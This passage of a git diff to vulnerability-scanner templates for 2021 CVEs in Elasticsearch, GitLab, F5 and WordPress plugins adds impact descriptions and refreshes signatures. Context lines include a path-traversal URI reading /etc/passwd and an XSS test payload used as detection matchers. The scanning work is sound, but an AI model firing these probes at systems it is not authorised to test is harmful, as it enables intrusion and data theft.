+# digest: 4a0a0047304502201e5781873af1c4534d57f2740e0897b8c0feef7c8b130c5c95f6652572176ac7022100dc443e522843412a7c7be03ff89f6ddfaa157005b9c02d79e6d1cfb5e8733c46:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-22145.yaml b/http/cves/2021/CVE-2021-22145.yaml
index 5ad1724d23..0bff722753 100644
--- a/http/cves/2021/CVE-2021-22145.yaml
+++ b/http/cves/2021/CVE-2021-22145.yaml
@@ -5,6 +5,8 @@ info:
   author: dhiyaneshDk
   severity: medium
   description: ElasticSsarch 7.10.0 to 7.13.3 is susceptible to information disclosure. A user with the ability to submit arbitrary queries can submit a malformed query that results in an error message containing previously used portions of a data buffer. This buffer can contain sensitive information such as Elasticsearch documents or authentication details, thus potentially leading to data modification and/or execution of unauthorized operations.
+  impact: |
+    An attacker can exploit this vulnerability to gain unauthorized access to sensitive information.
   remediation: |
     Upgrade Elasticsearch to a version that is not affected by CVE-2021-22145.
   reference:
@@ -51,4 +53,4 @@ http:
       - type: status
         status:
           - 400
-# digest: 4b0a00483046022100e246e8ea1e2637c29d9f7f25eadc1c5b9d0f445b0bf89a4da3f68687ab9eed7902210083fd81421a51296cb2369b2bba0d9ef4d9a43a2c85d2aa2c44caf4e96bc1d443:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402205a39a513dd8e57adaa9aa37f164e7d05db6a491ea87b85a343e2a318300a9f890220754c50ad4e229ecfecd303068d1491b60bc722360fad36e8f55de4f988c920d2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-22205.yaml b/http/cves/2021/CVE-2021-22205.yaml
index 2b55797461..2219e695a6 100644
--- a/http/cves/2021/CVE-2021-22205.yaml
+++ b/http/cves/2021/CVE-2021-22205.yaml
@@ -5,6 +5,8 @@ info:
   author: GitLab Red Team
   severity: critical
   description: GitLab CE/EE starting from 11.9 does not properly validate image files that were passed to a file parser, resulting in a remote command execution vulnerability. This template attempts to passively identify vulnerable versions of GitLab without the need for an exploit by matching unique hashes for the application-<hash>.css file in the header for unauthenticated requests. Positive matches do not guarantee exploitability. Tooling to find relevant hashes based on the semantic version ranges specified in the CVE is linked in the references section below.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected GitLab instance.
   remediation: |
     Upgrade to GitLab CE/EE version 13.10.3 or 13.11.1 to mitigate this vulnerability.
   reference:
@@ -136,4 +138,4 @@ http:
         group: 1
         regex:
           - '(?:application-)(\S{64})(?:\.css)'
-# digest: 490a00463044022078767ec84c7cd61f6b208030ac7c47f47ef1b79ce492e93c7754feb5c532f580022070fa5e07dda743948dcd68d149a80ad738481bb7e33c7043d19bc28a33f36cc2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100e777aed428c5672cfcb065aaeaea585f740c9262950f520f33c681b62aed54c702202ae152122578e3de5eda17a36c350df6110a44e276b07d480c9e00bf4eb10061:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-22214.yaml b/http/cves/2021/CVE-2021-22214.yaml
index 6d9d39159d..a5e127c9a6 100644
--- a/http/cves/2021/CVE-2021-22214.yaml
+++ b/http/cves/2021/CVE-2021-22214.yaml
@@ -9,6 +9,8 @@ info:
     - CVE-2021-39935
     - CVE-2021-22214
     - CVE-2021-22175
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to internal resources, potential data leakage, and further attacks on the system.
   remediation: |
     Upgrade Gitlab CE/EE to a version that is not affected by the vulnerability (10.6 or higher).
   reference:
@@ -49,4 +51,4 @@ http:
         part: body
         words:
           - "does not have valid YAML syntax"
-# digest: 4a0a00473045022100ae122a19f8acb487fc2311202c9bb5c60f776c1398ba9e21f08a7ae0cf65a031022042d3fb9b686662dd0b5c59760f00ab5c27082b5d4b086511a90b4d9296ed5389:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022029d8020f9736b3fdf5f391e7ab04a849810fc431b24b23e83dc807962f8b1ac402205b8fca662dff658fa509afd40ca66743ce119437a934245b77afae9ee5fac7fb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-22873.yaml b/http/cves/2021/CVE-2021-22873.yaml
index 18f2a62946..371a71df39 100644
--- a/http/cves/2021/CVE-2021-22873.yaml
+++ b/http/cves/2021/CVE-2021-22873.yaml
@@ -5,6 +5,8 @@ info:
   author: pudsec
   severity: medium
   description: Revive Adserver before 5.1.0 contains an open redirect vulnerability via the dest, oadest, and ct0 parameters of the lg.php and ck.php delivery scripts. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to redirect users to malicious websites, leading to phishing attacks or the execution of further attacks.
   remediation: |
     Upgrade Revive Adserver to version 5.1.0 or later to mitigate this vulnerability.
   reference:
@@ -47,4 +49,4 @@ http:
         part: header
         regex:
           - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1
-# digest: 490a0046304402202872b0237784142aef19a25664a5acb121a3b8a01b51dc92dabed08ea6b72f7402202ab5692053b3c5f60f0b9da11287fb17532e1d8116e003bdd9e2a919ae9bf2c6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220676d32fdb9c9352f2fe7fd764e5e47678eccce8a672ba70f25c37d0dcccec176022100ca318e94d328f53262763768060f980990018ead762be7aa1b1684058c01250c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-22911.yaml b/http/cves/2021/CVE-2021-22911.yaml
index b80c9cb487..535d28419f 100644
--- a/http/cves/2021/CVE-2021-22911.yaml
+++ b/http/cves/2021/CVE-2021-22911.yaml
@@ -5,6 +5,8 @@ info:
   author: tess,sullo
   severity: critical
   description: Rocket.Chat 3.11, 3.12 and 3.13 contains a NoSQL injection vulnerability which allows unauthenticated access to an API endpoint. An attacker can possibly obtain sensitive information from a database, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary NoSQL queries, leading to unauthorized access, data manipulation, or denial of service.
   remediation: |
     Upgrade Rocket.Chat to a version higher than 3.13 or apply the provided patch to mitigate the vulnerability.
   reference:
@@ -56,4 +58,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402202787d55f4f12ca58399f47f994e20664cc6c71de5c0dddda29d587023829b4fd02201d2559d71b65a57b0fdebfdc0ebdc64934216702fdfba93f4799727b7b5799a7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100f92c12393c6a5081571c39be509fe563a4d15636bace68323fb29d8c67255c1b02207bce239e7c1d4082fc7b937f25c00a6745525762623728559a7ac7d7d6c160e7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-22986.yaml b/http/cves/2021/CVE-2021-22986.yaml
index 4c3216844a..63507d0b06 100644
--- a/http/cves/2021/CVE-2021-22986.yaml
+++ b/http/cves/2021/CVE-2021-22986.yaml
@@ -5,6 +5,8 @@ info:
   author: rootxharsh,iamnoooob
   severity: critical
   description: F5 iControl REST interface is susceptible to remote command execution. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. This affects BIG-IP 16.0.x before 16.0.1.1, 15.1.x before 15.1.2.1, 14.1.x before 14.1.4, 13.1.x before 13.1.3.6, and 12.1.x before 12.1.5.3; and BIG-IQ 7.1.0.x before 7.1.0.3 and 7.0.0.x before 7.0.0.2.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the target system.
   remediation: |
     Apply the necessary security patches or updates provided by F5 Networks to mitigate the vulnerability.
   reference:
@@ -69,4 +71,4 @@ http:
         regex:
           - "\"commandResult\":\"(.*)\""
         part: body
-# digest: 4b0a00483046022100d494795fabf76f66ccd6ccb3ba7efa5f4a9395ddaa7e37f36f13c69dd647fa260221008260f99e34e22d913ac7e50c5af58bcf9cee47b6e446267aa651f7bc91765a76:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502210089f1ec9bc3ec40d2d5fc7f1727a8aeb8d54645319af7ee20bddec7199011f2a1022030eb2cdce6cf18d82edd17490f1ce50f14c9dad8544b92aec100f2b4121c8358:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-23241.yaml b/http/cves/2021/CVE-2021-23241.yaml
index a5ad781e3f..00f554219f 100644
--- a/http/cves/2021/CVE-2021-23241.yaml
+++ b/http/cves/2021/CVE-2021-23241.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: MERCUSYS Mercury X18G 1.0.5 devices are vulnerable to local file inclusion via ../ in conjunction with a loginLess or login.htm URI (for authentication bypass) to the web server, as demonstrated by the /loginLess/../../etc/passwd URI.
+  impact: |
+    An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the router.
   remediation: |
     Apply the latest firmware update provided by the vendor to fix the LFI vulnerability and ensure proper input validation is implemented.
   reference:
@@ -41,4 +43,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100aed712f0dcf8c4505a4df1c5aba184eac217ba9e5359870a79b059e7aa8676d2022100e3889899064b8c460e64b9cb59fb013bb9ac9abc76a8f38578e7efc340dac94e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100d9ee5a908a36d8345c74da85767b70866ce60855c9bc3a1df908dcbae8e97a2c0220613b505aa32fff1a451e5d905243cea93da7b862ba6ead8f07c471785db1867b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-24145.yaml b/http/cves/2021/CVE-2021-24145.yaml
index 69f39f5c3e..a66a27dc6b 100644
--- a/http/cves/2021/CVE-2021-24145.yaml
+++ b/http/cves/2021/CVE-2021-24145.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     WordPress Modern Events Calendar Lite plugin before 5.16.5 is susceptible to authenticated arbitrary file upload. The plugin does not properly check the imported file, allowing PHP files to be uploaded and/or executed by an administrator or other high-privilege user using the text/csv content-type in the request. This can possibly lead to remote code execution.
+  impact: |
+    Remote code execution
   remediation: Fixed in version 5.16.5.
   reference:
     - https://wpscan.com/vulnerability/f42cc26b-9aab-4824-8168-b5b8571d1610
@@ -65,4 +67,4 @@ http:
           - status_code_3 == 200
           - contains(body_3, 'CVE-2021-24145')
         condition: and
-# digest: 4b0a00483046022100c3001152c10d12631f9642ce2a31113ffb7c4189053d8b552dd53fb6527d06e2022100b64d9f602c0fbb9577064df99a881e6e3c9e516de59ebd66c850ddf12855ef57:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100f84fbefa6e7344eb18f60f331cd2bd5156ee17099a623a4a0a18e01514ea37b40221008c655c28c8eb5ed977515c20cf8427c9ea14bfec20f4f1160fc403d0e7eec569:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-24146.yaml b/http/cves/2021/CVE-2021-24146.yaml
index b7dd58ec61..2f5276728f 100644
--- a/http/cves/2021/CVE-2021-24146.yaml
+++ b/http/cves/2021/CVE-2021-24146.yaml
@@ -5,6 +5,8 @@ info:
   author: random_robbie
   severity: high
   description: WordPress Modern Events Calendar Lite before 5.16.5 does not properly restrict access to the export files, allowing unauthenticated users to exports all events data in CSV or XML format.
+  impact: |
+    An attacker can exploit this vulnerability to gain access to sensitive information, such as user credentials or database contents.
   remediation: |
     Update to the latest version of the Modern Events Calendar Lite plugin (5.16.5 or higher) to fix the vulnerability.
   reference:
@@ -43,4 +45,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100a401d544a4db31fd3c09cfcb44dc5ddc61c8e800493dcb4ba1a92bcd52749d36022025d631d4d094e2528cdac0cd56342ea48e6392495c4629f40e8bd64a7182f474:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502202b4b7102545872624d0e0f9e1921e721e263db2882737e14b61c55fcfcdbb7aa022100e99ec49bd87ccaf5d1de101ac553408051fbc2455107c6b19e9392bf789eac54:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-24150.yaml b/http/cves/2021/CVE-2021-24150.yaml
index 7acfed4a40..de95a74c8f 100644
--- a/http/cves/2021/CVE-2021-24150.yaml
+++ b/http/cves/2021/CVE-2021-24150.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     WordPress Like Button Rating plugin before 2.6.32 is susceptible to server-side request forgery. An attacker can obtain sensitive information, modify data, and/or execute unauthorized operations.
+  impact: |
+    An attacker can exploit this vulnerability to make requests to internal resources, potentially leading to unauthorized access or information disclosure.
   remediation: |
     Update the WordPress Like Button Rating plugin to version 2.6.32 or later.
   reference:
@@ -45,4 +47,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100ff7442973725ca700f1cca7478336590e7850bb28833b628fc7457d507bb9326022100f1d27318bf577c4584f6b16262a331abf471b24e410d6851b7d162eef3a3f98c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220181ebed40b4ad0110cc29375850d7bbebbd80894fbc3cd33bf8d91f1ead69a4d0220652d30f31d68b6b8cd4aaaee6fee9d2ef8a09dc6d5d4d4ad95cdde1ac1bcb55a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-24155.yaml b/http/cves/2021/CVE-2021-24155.yaml
index 8091f4f137..9c63190fdc 100644
--- a/http/cves/2021/CVE-2021-24155.yaml
+++ b/http/cves/2021/CVE-2021-24155.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     WordPress Backup Guard plugin before 1.6.0 is susceptible to authenticated arbitrary file upload. The plugin does not ensure that imported files are in SGBP format and extension, allowing high-privilege users to upload arbitrary files, including PHP, possibly leading to remote code execution.
+  impact: |
+    Remote code execution
   remediation: Fixed in version 1.6.0.
   reference:
     - https://wpscan.com/vulnerability/d442acac-4394-45e4-b6bb-adf4a40960fb
@@ -77,4 +79,4 @@ http:
         regex:
           - BG_BACKUP_STRINGS = {"nonce":"([0-9a-zA-Z]+)"};
         internal: true
-# digest: 4b0a00483046022100b61006aeee7f23714446a2e7cccab49b802fcfd7a8be804a4f0445a9f14bc196022100ec8d6d3171f169ae4dd5b4b3cc8ad796c1c1093757b1ffc0b89b6c12e7747bcb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220521831ee453f04ae62a448033f32a9e04ce864e31fa5b49ef1ad3b516f8ee33102210081dbda7b185029a02191a8cc535cfaf430d5caa8e0902b00cf5f0a14a4cd4ab4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-24165.yaml b/http/cves/2021/CVE-2021-24165.yaml
index 272d2a0da1..83dabbfe1c 100644
--- a/http/cves/2021/CVE-2021-24165.yaml
+++ b/http/cves/2021/CVE-2021-24165.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WordPress Ninja Forms plugin before 3.4.34 contains an open redirect vulnerability via the wp_ajax_nf_oauth_connect AJAX action, due to the use of a user-supplied redirect parameter and no protection in place. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
+  impact: |
+    An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the installation of malware.
   remediation: |
     Update to the latest version of the Ninja Forms plugin (3.4.34 or higher) to fix the open redirect vulnerability.
   reference:
@@ -48,4 +50,4 @@ http:
           - 'status_code_2 == 302'
           - "contains(header_2, 'Location: https://interact.sh?client_id=1')"
         condition: and
-# digest: 4a0a004730450220667e81f3f735c27e486edfc29956a8dc08482677ffbcb8846a514d3e2970d49d0221009dd54c4f794ac749eb2292d28c1565cc843f01ffcd74d5e629ea25e380cb62ba:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402204def74bc9307c710437277aa258a0d46596648d3b2b604b7faf4c2b07af58e3302202dbfc14406d3a16d7cbde5e23db5a10901ec835fc65fade4c681c4cf2d520367:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-24169.yaml b/http/cves/2021/CVE-2021-24169.yaml
index 3c94f8ca4a..c7900f5fcb 100644
--- a/http/cves/2021/CVE-2021-24169.yaml
+++ b/http/cves/2021/CVE-2021-24169.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WordPress Advanced Order Export For WooCommerce plugin before 3.1.8 contains an authenticated cross-site scripting vulnerability via the tab parameter in the admin panel. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Authenticated users can execute arbitrary scripts on the affected WordPress site, leading to potential data theft, defacement, or further compromise.
   remediation: Fixed in version 3.1.8.
   reference:
     - https://wpscan.com/vulnerability/09681a6c-57b8-4448-982a-fe8d28c87fc3
@@ -47,4 +49,4 @@ http:
           - 'contains(body_2, "<script>alert(document.domain)</script>")'
           - 'contains(body_2, "woo-order-export-lite")'
         condition: and
-# digest: 4a0a00473045022100dd0b10da35b55d27f2b5116552e357bbb7d374baff02c156d91a830dfe32c29102206c1eb7939854eba7e4843d19af1450c0a385000f09d1dff796dab2ff6e6442a6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402203139b1528bcc8f8121690dc3d53b8e65d9aeffac4bc0763189420f24ef99df9902203c585d5505ce463a955426a71372b296652a96e5374104ca4506703fa4d43543:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-24176.yaml b/http/cves/2021/CVE-2021-24176.yaml
index ea2b4ad36d..e7d59657a6 100644
--- a/http/cves/2021/CVE-2021-24176.yaml
+++ b/http/cves/2021/CVE-2021-24176.yaml
@@ -5,6 +5,8 @@ info:
   author: Ganofins
   severity: medium
   description: WordPress JH 404 Logger plugin through 1.1 contains a cross-site scripting vulnerability. Referer and path of 404 pages are not properly sanitized when they are output in the WordPress dashboard, which can lead to executing arbitrary JavaScript code.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions.
   remediation: |
     Update to the latest version of WordPress JH 404 Logger plugin (>=1.2) which addresses the XSS vulnerability.
   reference:
@@ -42,4 +44,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402201e9a175013f2fa6f191b271545f3c47a00e268c1c0011fbbaf5652a2eb777f7d02205fad3bd59d572dd7dc1d4c8de90f21c2985b57a4cb8981bd01c524721dfb38ed:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220529c28ac516f174684296d81d16310e63a66dfaa5f0945a75dde4f4447bef52502201a2e1b50d92bd74bd4bef9f4795748997863c6bece33f335a3578948b18e2a1c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-24210.yaml b/http/cves/2021/CVE-2021-24210.yaml
index 1a8b651d1f..3e9fa55202 100644
--- a/http/cves/2021/CVE-2021-24210.yaml
+++ b/http/cves/2021/CVE-2021-24210.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WordPress PhastPress plugin before 1.111 contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
+  impact: |
+    An attacker can exploit this vulnerability to redirect users to malicious websites, leading to potential phishing attacks or the execution of other malicious activities.
   remediation: |
     Update the WordPress PhastPress plugin to version 1.111 or later to mitigate the vulnerability.
   reference:
@@ -37,4 +39,4 @@ http:
         part: header
         regex:
           - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
-# digest: 490a0046304402201f3fb512654c61a4cba057c5f55402c6323b30c4213a7cabb79b4eb4f58c502802202b64cfcade21ba071bab19dc98465223223b5e9824388d3dd305ec0176a953e0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220329e67015a11da0e99cbea3105b9b51306f38d58c7a5d212c50edb6292c3892702210087d48191e91ea3ffd3a3f3d59050f67cf4d66907f95d48d612d047f51c99abc7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-24214.yaml b/http/cves/2021/CVE-2021-24214.yaml
index e090073310..98bc98fe23 100644
--- a/http/cves/2021/CVE-2021-24214.yaml
+++ b/http/cves/2021/CVE-2021-24214.yaml
@@ -5,6 +5,8 @@ info:
   author: tess
   severity: medium
   description: WordPress OpenID Connect Generic Client plugin 3.8.0 and 3.8.1 contains a cross-site scripting vulnerability. It does not sanitize the login error when output back in the login form, thereby not requiring authentication, which can be exploited with the default configuration.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Update to the latest version of the WordPress OpenID Connect Generic Client plugin (3.8.2) to fix this vulnerability.
   reference:
@@ -49,4 +51,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502200973265bdd4a3fe940abfb532146ac1f0b48398800fadf0aab6bb7488f0470a4022100b6923ca84983b28f482d79323083fdabd3c2f74418d0439dc3d9626a2814aabd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100d258db47eb6a8af9360ee82439082b93836c9d08a87ce318f2b414d391650dbc022100838c6317f5c624cae5cd969d468ae6d2f000e76ba701279972451bcfa4982948:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-24226.yaml b/http/cves/2021/CVE-2021-24226.yaml
index 385caac3f8..0ca21195d5 100644
--- a/http/cves/2021/CVE-2021-24226.yaml
+++ b/http/cves/2021/CVE-2021-24226.yaml
@@ -5,6 +5,8 @@ info:
   author: dhiyaneshDK
   severity: high
   description: WordPress AccessAlly plugin before 3.5.7 allows sensitive information leakage because the file \"resource/frontend/product/product-shortcode.php\" (which is responsible for the [accessally_order_form] shortcode) dumps serialize($_SERVER), which contains all environment variables. The leakage occurs on all public facing pages containing the [accessally_order_form] shortcode, and no login or administrator role is required.
+  impact: |
+    An attacker can exploit this vulnerability to gain access to sensitive information.
   remediation: |
     Upgrade AccessAlly to version 3.5.7 or higher to fix the vulnerability.
   reference:
@@ -41,4 +43,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502207e29b70fb2c74b57131ce84d8e82ea783f26defb4fe7a67ad25a65592c37d25d022100c8f3900d2521d0402b75e6f932aabd521617d7102c989b95faac873e2d471ada:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100f56b1d791cbdd55d76ff86d6038b3465b78732969b58f78c82e1aff5d481ab4a022031885bea6125ee41aa0d54513bd8ac92ee04b54e2db1660d77819dd9303744ab:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-24227.yaml b/http/cves/2021/CVE-2021-24227.yaml
index a8b102d926..6b5a83d97e 100644
--- a/http/cves/2021/CVE-2021-24227.yaml
+++ b/http/cves/2021/CVE-2021-24227.yaml
@@ -5,6 +5,8 @@ info:
   author: theamanrawat
   severity: high
   description: Patreon WordPress before version 1.7.0 is vulnerable to unauthenticated local file inclusion that could be abused by anyone visiting the site. Exploitation by an attacker could leak important internal files like wp-config.php, which contains database credentials and cryptographic keys used in the generation of nonces and cookies.
+  impact: |
+    An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to further compromise of the system.
   remediation: |
     Upgrade to Patreon WordPress plugin version 1.7.0 or later to mitigate this vulnerability.
   reference:
@@ -41,4 +43,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 490a0046304402200fb012dcd046e7b895ec5ac4d049817678a4ae4ad5ad721ef3679d5d4001d18b022007fa36d79f30be716a3d52c05a0f2e3018345c97667f379a3e873df8e217e528:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022057d7563598647aadbdf5aec41c3bfe52bb4a1159849eedb1459c207049ea1340022100b50a20691b4cc5405f3adf578da6b4eda1b5276def4a08ffe29775002f046610:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-24235.yaml b/http/cves/2021/CVE-2021-24235.yaml
index f37e32e6f1..5173993f91 100644
--- a/http/cves/2021/CVE-2021-24235.yaml
+++ b/http/cves/2021/CVE-2021-24235.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: WordPress Goto Tour & Travel theme before 2.0 contains an unauthenticated reflected cross-site scripting vulnerability. It does not sanitize the keywords and start_date GET parameters on its Tour List page.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, leading to potential data theft, session hijacking, or defacement.
   remediation: |
     Update to the latest version of the WordPress Goto Tour & Travel Theme (>=2.0) to mitigate the XSS vulnerability.
   reference:
@@ -49,4 +51,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100aa42ca2f69ab9ef489b184533e44b9d6d587dea4107ff1340d1336d29146631b022100c84d6576fda7685d68c65c3c7e2dd95383ec93ab7353712111f90aad55002ba7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022038f63f37963cd999e4aa043c12144760b8dd18d0df381f0846b1a4de78559fae022002612346af937d4126c0cbee816161834bdb8c72197e1b5e35e834d457024ead:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-24236.yaml b/http/cves/2021/CVE-2021-24236.yaml
index 5ea20285ec..d870649232 100644
--- a/http/cves/2021/CVE-2021-24236.yaml
+++ b/http/cves/2021/CVE-2021-24236.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     WordPress Imagements plugin through 1.2.5 is susceptible to arbitrary file upload which can lead to remote code execution. The plugin allows images to be uploaded in comments but only checks for the Content-Type in the request to forbid dangerous files. An attacker can upload arbitrary files by using a valid image Content-Type along with a PHP filename and code.
+  impact: |
+    This vulnerability can lead to remote code execution and compromise the affected WordPress site.
   remediation: |
     Update WordPress Imagements plugin to version 1.2.6 or later to fix the arbitrary file upload vulnerability.
   reference:
@@ -90,4 +92,4 @@ http:
         part: body_2
         words:
           - "CVE-2021-24236"
-# digest: 4a0a00473045022100b4da37fa8d3d22d02924f55830d63411f7dc29d0168cde14a93d6db6346f2d6002203b19eeec82ef72c6925d1b128bc750ee57719ac5c5f555f62e9e41c207fabe53:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502206c911be801d31b8531ac7c46a7198b59b6b9efbeddd70069927a16099406f2ee022100e1de4ada420edd138824003dc30a8ade3e03ba4af3b423ab0afe8717e989aa7e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-24237.yaml b/http/cves/2021/CVE-2021-24237.yaml
index 50e1c182a7..1db715adbd 100644
--- a/http/cves/2021/CVE-2021-24237.yaml
+++ b/http/cves/2021/CVE-2021-24237.yaml
@@ -5,6 +5,8 @@ info:
   author: 0x_Akoko
   severity: medium
   description: WordPress Realteo plugin 1.2.3 and prior contains an unauthenticated reflected cross-site scripting vulnerability due to improper sanitization of keyword_search, search_radius. _bedrooms and _bathrooms GET parameters before outputting them in its properties page.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
   remediation: |
     Update to the latest version of the WordPress Realteo plugin (>=1.2.4) which includes a fix for the Cross-Site Scripting vulnerability.
   reference:
@@ -50,4 +52,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100fcb04b1ff9211158209e29d29fc6a57768f49174a40c52d3b6d490cecef99f0a022100f17ef50dddd3b08b9b540ba24e4b9ad1cf3027da826e4645ed4fada9cccc382a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402202198ef0ad3f01f5c0a6b58c52692930f28e918dd388d896406d7a56a8a1de13902203dbf95917a1676b8686fcb45f6b5ccbe3f1bff9b511a9a09fe0214848b0e8571:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2021/CVE-2021-24239.yaml b/http/cves/2021/CVE-2021-24239.yaml
index 04b465a9f3..0b6b60d600 100644
--- a/http/cves/2021/CVE-2021-24239.yaml
+++ b/http/cves/2021/CVE-2021-24239.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WordPress Pie Register plugin before 3.7.0.1 is susceptible to cross-site scripting. The plugin does not sanitize the invitaion_code GET parameter when outputting it in the Activation Code page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could lead to the execution of arbitrary script code in the context of the victim's browser, potentially allowing an attacker to steal sensitive information or perform actions on behalf of the victim.
   remediation: Fixed in version 3.7.0.1.
   reference:
     - https://wpscan.com/vulnerability/f1b67f40-642f-451e-a67a-b7487918ee34
@@ -38,4 +40,4 @@ http:
           - 'status_code == 200'
